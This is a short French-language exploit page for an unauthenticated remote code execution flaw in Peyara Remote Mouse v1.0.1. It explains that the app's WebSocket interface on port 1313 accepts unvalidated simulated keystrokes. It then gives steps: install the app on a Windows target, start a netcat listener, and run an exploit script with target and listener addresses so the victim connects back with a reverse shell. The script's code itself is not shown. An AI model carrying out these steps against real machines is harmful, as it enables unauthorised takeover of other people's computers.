
Peyara Remote Mouse v1.0.1- Exécution de code à distance (RCE)
Peyara Remote Mouse v1.0.1 contient une vulnérabilité d'exécution de code à distance sans authentification dans son interface de commandes WebSocket (port 1313). L'application ne valide pas et ne nettoie pas les commandes de saisie clavier simulées reçues via les connexions WebSocket, permettant aux attaquants d'enchaîner des événements clavier malveillants qui exécutent des commandes système arbitraires. Cette vulnérabilité peut être exploitée à distance sans authentification pour compromettre entièrement le système.
Installer l'application vulnérable
Téléchargez et installez Peyara Remote Mouse sur le système Windows cible.
Démarrer l'écouteur Netcat
Ouvrez un terminal et exécutez :
nc -nlvp 4444
Exécuter le script d'exploitation
python3 Peyara.py --target 192.168.1.107 --lhost 192.168.1.110 --lport 4444

